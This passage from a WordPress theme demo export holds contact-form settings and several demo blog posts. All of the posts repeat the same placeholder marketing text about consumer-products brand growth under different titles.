This e-mail was sent from a contact form on Maxbizz Business (http://wpdemo.archiwp.com/maxbizz-business)";s:9:"recipient";s:23:"support@oceanthemes.net";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:33:"Maxbizz Business "[your-subject]"";s:6:"sender";s:47:"Maxbizz Business <wordpress@wpdemo.archiwp.com>";s:4:"body";s:139:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Business (http://wpdemo.archiwp.com/maxbizz-business)";s:9:"recipient";s:12:"[your-email]";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:23:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:17:"captcha_not_match";s:31:"Your entered code is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Entering the Next Phase of Digital Transformation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/entering-the-next-phase-of-digital-transformation/</link>
		<pubDate>Mon, 18 Dec 2017 04:13:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=413</guid>
		<description></description>
		<content:encoded><![CDATA[<p><span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.</p>
<p><span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em></p>
<p><img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" /></p>
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.</p>
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”<br /><cite>DAVID OSWALD</cite></p>
</blockquote>
<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.</p>
<p><em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em></p>

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>413</wp:post_id>
		<wp:post_date><![CDATA[2017-12-18 04:13:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2017-12-18 04:13:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_format" nicename="post-format-audio"><![CDATA[Audio]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_audio]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[digital-transformation-roadmap-enablers]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>In Media, Trimming Costs Boosts Value Transform</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/in-media-trimming-costs-boosts-value-transform/</link>
		<pubDate>Tue, 09 Jan 2018 08:49:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=423</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>423</wp:post_id>
		<wp:post_date><![CDATA[2018-01-09 08:49:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-01-09 08:49:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-link"><![CDATA[Link]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>The Future of Retail: Asia’s Ecosystems</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/the-future-of-retail-asias-ecosystems/</link>
		<pubDate>Mon, 24 Feb 2020 09:00:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=430</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #d92300;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>430</wp:post_id>
		<wp:post_date><![CDATA[2020-02-24 09:00:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-02-24 09:00:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-video"><![CDATA[Video]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://vimeo.com/87959439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[bg_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[432]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Transformation Roadmap: Enablers</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/digital-transformation-roadmap-enablers/</link>
		<pubDate>Wed, 14 Aug 2019 09:02:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=434</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>434</wp:post_id>
		<wp:post_date><![CDATA[2019-08-14 09:02:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2019-08-14 09:02:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-transformation-roadmap-enablers]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-quote"><![CDATA[Quote]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_quote]]></wp:meta_key>
		<wp:meta_value><![CDATA[I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[quote_name]]></wp:meta_key>
		<wp:meta_value><![CDATA[David Oswald]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>How to Write a Successful Grant Application</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/how-to-write-a-successful-grant-application/</link>
		<pubDate>Thu, 08 Nov 2018 09:04:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=436</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>436</wp:post_id>
		<wp:post_date><![CDATA[2018-11-08 09:04:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-11-08 09:04:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[how-to-write-a-successful-grant-application]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-gallery"><![CDATA[Gallery]]></category>
		<category domain="post_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2018-11-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
